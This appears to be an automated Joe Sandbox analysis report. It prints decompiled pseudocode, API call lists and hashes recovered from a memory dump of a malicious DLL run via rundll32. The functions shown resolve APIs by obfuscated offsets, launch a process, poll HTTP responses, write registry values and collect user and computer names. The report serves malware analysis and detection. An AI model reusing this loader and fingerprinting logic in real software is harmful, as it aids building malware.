0x044b63d5
0x044b63de
0x044b63f4
0x044b63f9
0x044b63fd
0x044b6401
0x044b6406
0x044b640b
0x044b640d
0x044b640d
0x044b6417
0x044b6420
0x044b6427
0x044b6443
0x044b6447
0x044b6480
0x044b6449
0x044b644c
0x044b6454
0x044b6465
0x044b646d
0x044b6475
0x044b6479
0x044b6479
0x044b6447
0x044b6488
0x044b6488
0x044b6490
0x044b6490
0x044b6498
0x044b6498
0x044b64a4

APIs

GetTickCount.KERNEL32 ref: 044B630E
lstrlen.KERNEL32(00000000,00000005), ref: 044B638F
lstrlen.KERNEL32(?), ref: 044B63A0
lstrlen.KERNEL32(00000000), ref: 044B63A7
lstrlenW.KERNEL32(80000002), ref: 044B63AE
lstrlen.KERNEL32(?,00000004), ref: 044B6417
lstrlen.KERNEL32(?), ref: 044B6420
lstrlen.KERNEL32(?), ref: 044B6427
lstrlenW.KERNEL32(?), ref: 044B642E

Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: dfd114b9bcafdc0400a5daa678fae1cbecd3963f89853483ce4341626a2ed0f8
Instruction ID: 469cb8f84320c9c698f7b625ead8ddb7534cedafc834c09d7733d992280c42ca
Opcode Fuzzy Hash: dfd114b9bcafdc0400a5daa678fae1cbecd3963f89853483ce4341626a2ed0f8
Instruction Fuzzy Hash: 0D51BF72D00219ABDF12AFA5DC44ADE7BB5EF44314F06802AF904A7211DB35EA21DFE5

Uniqueness

Uniqueness Score: -1.00%

Function 044B402A Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E044B402A(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E044B44DE(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E044B7A1E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x44ba300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x44ba348; // 0x9ad5a8
					_t18 = _t47 + 0x44bb3f3; // 0x73797325
					_t68 = E044B7326(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x44ba348; // 0x9ad5a8
						_t19 = _t50 + 0x44bb73f; // 0x4e68ce7
						_t20 = _t50 + 0x44bb0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E044B23AA();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E044B23AA();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x44ba2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E044B6C2C(_t70);
				goto L12;
			}

0x044b4032
0x044b4032
0x044b4041
0x044b4048
0x044b404d
0x044b415a
0x044b4161
0x044b4161
0x044b405c
0x044b4064
0x044b4067
0x044b406c
0x044b4081
0x044b4087
0x044b4088
0x044b408b
0x044b4091
0x044b4094
0x044b4099
0x044b40a1
0x044b40ad
0x044b40b1
0x044b4141
0x044b40b7
0x044b40b7
0x044b40bc
0x044b40c3
0x044b40d7
0x044b40db
0x044b412a
0x044b40dd
0x044b40de
0x044b40e5
0x044b40fe
0x044b4100
0x044b4104
0x044b410b
0x044b4125
0x044b410d
0x044b4116
0x044b411b
0x044b411b
0x044b410b
0x044b4139
0x044b4139
0x044b40b1
0x044b4148
0x044b4151
0x044b4155
0x00000000

APIs

Part of subcall function 044B44DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,044B4046,?,?,?,?,00000000,00000000), ref: 044B4503
Part of subcall function 044B44DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 044B4525
Part of subcall function 044B44DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 044B453B
Part of subcall function 044B44DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044B4551
Part of subcall function 044B44DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044B4567
Part of subcall function 044B44DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044B457D

memset.NTDLL ref: 044B4094

Part of subcall function 044B7326: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,044B40AD,73797325), ref: 044B7337
Part of subcall function 044B7326: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 044B7351

GetModuleHandleA.KERNEL32(4E52454B,04E68CE7,73797325), ref: 044B40CA
GetProcAddress.KERNEL32(00000000), ref: 044B40D1
HeapFree.KERNEL32(00000000,00000000), ref: 044B4139

Part of subcall function 044B23AA: GetProcAddress.KERNEL32(36776F57,044B7989), ref: 044B23C5

CloseHandle.KERNEL32(00000000,00000001), ref: 044B4116
CloseHandle.KERNEL32(?), ref: 044B411B
GetLastError.KERNEL32(00000001), ref: 044B411F

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: 530bc3f2dae397b6c2cd42603ee8637f6dd56315ed3225ea87b98990e24ea0cd
Instruction ID: 6d7f2da4673c204cc32ff23e680c3c0f756092bd3b7f46de69453456361b746a
Opcode Fuzzy Hash: 530bc3f2dae397b6c2cd42603ee8637f6dd56315ed3225ea87b98990e24ea0cd
Instruction Fuzzy Hash: 723121B6D00219BFEF10AFA4DC88DDEBBBCEB04345F10446AE645A7212D6346D458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B4A85 Relevance: 10.6, APIs: 7, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B4A85(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E044B6D63(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E044B6C2C(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E044B6E40( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x044b4a85
0x044b4a85
0x044b4a95
0x044b4a98
0x044b4a9c
0x044b4aa2
0x044b4aa7
0x044b4ac0
0x044b4ad4
0x044b4adb
0x044b4ae2
0x044b4b35
0x044b4b3b
0x044b4b41
0x044b4b7c
0x044b4b82
0x00000000
0x00000000
0x00000000
0x044b4b41
0x044b4ae8
0x00000000
0x044b4aef
0x044b4afd
0x044b4b00
0x044b4b03
0x044b4b0f
0x044b4b13
0x044b4b75
0x044b4b15
0x044b4b27
0x044b4b65
0x044b4b70
0x044b4b29
0x044b4b2c
0x044b4b30
0x044b4b30
0x044b4b27
0x00000000
0x044b4b13
0x044b4ae8
0x044b4aac
0x044b4ab2
0x044b4ab5
0x044b4aba
0x00000000
0x00000000
0x00000000
0x044b4b4a
0x044b4b52
0x044b4b57
0x044b4b5a
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76DC81D0,00000000,00000000), ref: 044B4A9C
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?), ref: 044B4AAC
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 044B4ADE
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 044B4B03
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 044B4B23
GetLastError.KERNEL32 ref: 044B4B35

Part of subcall function 044B6E40: WaitForMultipleObjects.KERNEL32(00000002,044B7BB5,00000000,044B7BB5,?,?,?,044B7BB5,0000EA60), ref: 044B6E5B

Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38

GetLastError.KERNEL32(00000000), ref: 044B4B6A

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 3369646462-0
Opcode ID: 0681c656af1bb88333daec8d86a107bf222a66f4b24f8e33296c3390e678b4db
Instruction ID: cee249cdf6d3aaf32d4c8f90b4f38571d765128afd70c9f252a0c6260861a113
Opcode Fuzzy Hash: 0681c656af1bb88333daec8d86a107bf222a66f4b24f8e33296c3390e678b4db
Instruction Fuzzy Hash: 0431F2B5904709EFDF21DFE5CC84ADFB7B8EB08304F10456AD642A2242D775AA44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B3F07 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 044B3F61
SysAllocString.OLEAUT32(0070006F), ref: 044B3F75
SysAllocString.OLEAUT32(00000000), ref: 044B3F87
SysFreeString.OLEAUT32(00000000), ref: 044B3FEF
SysFreeString.OLEAUT32(00000000), ref: 044B3FFE
SysFreeString.OLEAUT32(00000000), ref: 044B4009

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 24b944799779ab0e9abc3ce19369d1ce312f7fde04243fd5fa0c85351c5735cb
Instruction ID: ea590343ab5bec8e567165819e54f6ec7c7ead4db0f1d3cedfcb69d1690f5de7
Opcode Fuzzy Hash: 24b944799779ab0e9abc3ce19369d1ce312f7fde04243fd5fa0c85351c5735cb
Instruction Fuzzy Hash: 0B415C32900A09AFDF01DFB9C844AEFB7B9EF49310F14442AED14EB211DA71A905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 044B44DE Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B44DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E044B6D63(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x44ba348; // 0x9ad5a8
					_t1 = _t23 + 0x44bb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x44ba348; // 0x9ad5a8
					_t2 = _t26 + 0x44bb761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E044B6C2C(_t54);
					} else {
						_t30 =  *0x44ba348; // 0x9ad5a8
						_t5 = _t30 + 0x44bb74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x44ba348; // 0x9ad5a8
							_t7 = _t33 + 0x44bb771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x44ba348; // 0x9ad5a8
								_t9 = _t36 + 0x44bb4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x44ba348; // 0x9ad5a8
									_t11 = _t39 + 0x44bb786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E044B190C(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x044b44ed
0x044b44f1
0x044b45b3
0x044b44f7
0x044b44f7
0x044b44fc
0x044b450f
0x044b4511
0x044b4516
0x044b451e
0x044b4525
0x044b4527
0x044b452c
0x044b45ab
0x044b45ac
0x044b452e
0x044b452e
0x044b4533
0x044b453b
0x044b453d
0x044b4542
0x00000000
0x044b4544
0x044b4544
0x044b4549
0x044b4551
0x044b4553
0x044b4558
0x00000000
0x044b455a
0x044b455a
0x044b455f
0x044b4567
0x044b4569
0x044b456e
0x00000000
0x044b4570
0x044b4570
0x044b4575
0x044b457d
0x044b457f
0x044b4584
0x00000000
0x044b4586
0x044b458c
0x044b4591
0x044b4598
0x044b459d
0x044b45a2
0x00000000
0x044b45a4
0x044b45a7
0x044b45a7
0x044b45a2
0x044b4584
0x044b456e
0x044b4558
0x044b4542
0x044b452c
0x044b45c1

APIs

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,044B4046,?,?,?,?,00000000,00000000), ref: 044B4503
GetProcAddress.KERNEL32(00000000,7243775A), ref: 044B4525
GetProcAddress.KERNEL32(00000000,614D775A), ref: 044B453B
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044B4551
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044B4567
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044B457D

Part of subcall function 044B190C: memset.NTDLL ref: 044B198B

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 24d475015bd9ed535fe350acfd23998bed55ed28fa8d3313b1485a76ffb0a084
Instruction ID: 1931f94cf631b3929aa4fac009b05ad8b51f82ba351da418cf1e7c12f01351b5
Opcode Fuzzy Hash: 24d475015bd9ed535fe350acfd23998bed55ed28fa8d3313b1485a76ffb0a084
Instruction Fuzzy Hash: 252121B1501B0A9FEB10DFA9C884E9B77FCEF446047018426EA85D7252DB74F9058BE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B3472 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E044B3472(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x44ba3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E044B61FC( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E044B6F28(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E044B6C2C(_a8);
						goto L29;
					}
					_t64 =  *0x44ba318; // 0x4e69d70
					_t16 = _t64 + 0xc; // 0x4e69e92
					_t65 = E044B61FC(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d044b90
						if(E044B4822(_t97,  *_t33, _t91, _a8,  *0x44ba3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x44ba348; // 0x9ad5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x44bba4c; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x44bba47; // 0x55434b48
								_t69 = _t34;
							}
							if(E044B62F6(_t69,  *0x44ba3d4,  *0x44ba3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x44ba348; // 0x9ad5a8
									_t44 = _t71 + 0x44bb842; // 0x74666f53
									_t73 = E044B61FC(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d044b90
										E044B74B6( *_t47, _t91, _a8,  *0x44ba3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d044b90
										E044B74B6( *_t49, _t91, _t99,  *0x44ba3d0, _a16);
										E044B6C2C(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d044b90
									E044B74B6( *_t40, _t91, _a8,  *0x44ba3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d044b90
									E044B74B6( *_t43, _t91, _a8,  *0x44ba3d0, _a16);
								}
								if( *_t101 != 0) {
									E044B6C2C(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d044b90
					_t81 = E044B12CA( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d044b90
							E044B4822(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E044B6C2C(_t100);
						_t98 = _a16;
					}
					E044B6C2C(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E044B7A1E(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x44ba3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x044b3472
0x044b347b
0x044b3482
0x044b3487
0x044b34f4
0x044b34fa
0x044b34ff
0x044b3506
0x044b350b
0x044b3510
0x044b367b
0x044b3682
0x044b3682
0x044b3687
0x044b3689
0x044b3689
0x044b3692
0x044b3692
0x044b3516
0x044b3522
0x044b3671
0x044b3674
0x00000000
0x044b3674
0x044b3528
0x044b352d
0x044b3530
0x044b3535
0x044b353a
0x044b3583
0x044b3583
0x044b3596
0x044b35a0
0x044b35a6
0x044b35ad
0x044b35b7
0x044b35b7
0x044b35af
0x044b35af
0x044b35af
0x044b35af
0x044b35d9
0x044b35e1
0x044b360f
0x044b3614
0x044b361b
0x044b3620
0x044b3624
0x044b3656
0x044b3626
0x044b3633
0x044b3636
0x044b3646
0x044b3649
0x044b364f
0x044b364f
0x044b35e3
0x044b35f0
0x044b35f3
0x044b3605
0x044b3608
0x044b3608
0x044b3660
0x044b366c
0x044b3662
0x044b3665
0x044b3665
0x044b3660
0x044b35d9
0x00000000
0x044b35a0
0x044b3549
0x044b354c
0x044b3553
0x044b3559
0x044b355c
0x044b355e
0x044b356a
0x044b356d
0x044b356d
0x044b3573
0x044b3578
0x044b3578
0x044b357e
0x00000000
0x044b357e
0x044b348c
0x00000000
0x044b34b3
0x044b34b3
0x044b34bf
0x044b34d2
0x044b34d8
0x044b34e0
0x00000000
0x044b34e0

APIs

StrChrA.SHLWAPI(044B7168,0000005F,00000000,00000000,00000104), ref: 044B34A5
lstrcpy.KERNEL32(?,?), ref: 044B34D2

Part of subcall function 044B61FC: lstrlen.KERNEL32(?,00000000,04E69D70,00000000,044B39E8,04E69F93,69B25F44,?,?,?,?,69B25F44,00000005,044BA00C,4D283A53,?), ref: 044B6203
Part of subcall function 044B61FC: mbstowcs.NTDLL ref: 044B622C
Part of subcall function 044B61FC: memset.NTDLL ref: 044B623E

Part of subcall function 044B74B6: lstrlenW.KERNEL32(?,?,?,044B363B,3D044B90,80000002,044B7168,044B7283,74666F53,4D4C4B48,044B7283,?,3D044B90,80000002,044B7168,?), ref: 044B74DB

Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38

lstrcpy.KERNEL32(?,00000000), ref: 044B34F4

Strings

(, xrefs: 044B3555
\, xrefs: 044B34D8

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: bb13993c40bd9bcdc526065b1693eef3b1e9c0be0c00ab33bf59282c4b015893
Instruction ID: 20a239fb728e252939495ae9a823599f1d1d883952f3fc37350e4e5b3eb3bb78
Opcode Fuzzy Hash: bb13993c40bd9bcdc526065b1693eef3b1e9c0be0c00ab33bf59282c4b015893
Instruction Fuzzy Hash: 52515E71500209EFEF219FA5DC40EDA3BB9EF08344F00851AFD9596261DB35ED25ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 044B2A11 Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B2A11() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x7477c742
						_v12 = _v12 + _t11;
						_t64 = E044B6D63(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E044B6C2C(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x44b57e9
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x044b2a1f
0x044b2a22
0x044b2a25
0x044b2a2b
0x044b2a30
0x044b2a36
0x044b2a3e
0x044b2a41
0x044b2a47
0x044b2a4c
0x044b2a55
0x044b2a59
0x044b2a66
0x044b2a6a
0x044b2a6c
0x044b2a70
0x044b2a73
0x044b2a83
0x044b2ad6
0x044b2ad7
0x044b2a85
0x044b2a8a
0x044b2a8b
0x044b2a90
0x044b2a93
0x044b2aa6
0x00000000
0x044b2aa8
0x044b2aab
0x044b2ab0
0x044b2abe
0x044b2ac1
0x044b2ac7
0x044b2acc
0x00000000
0x044b2ace
0x044b2ace
0x044b2ad1
0x044b2ad1
0x044b2acc
0x044b2aa6
0x044b2adc
0x044b2add
0x044b2a4c
0x044b2ae3

APIs

GetUserNameW.ADVAPI32(00000000,044B57E7), ref: 044B2A25
GetComputerNameW.KERNEL32(00000000,044B57E7), ref: 044B2A41

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

GetUserNameW.ADVAPI32(00000000,044B57E7), ref: 044B2A7B
GetComputerNameW.KERNEL32(044B57E7,7477C740), ref: 044B2A9E
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,044B57E7,00000000,044B57E9,00000000,00000000,?,7477C740,044B57E7), ref: 044B2AC1

Memory Dump Source

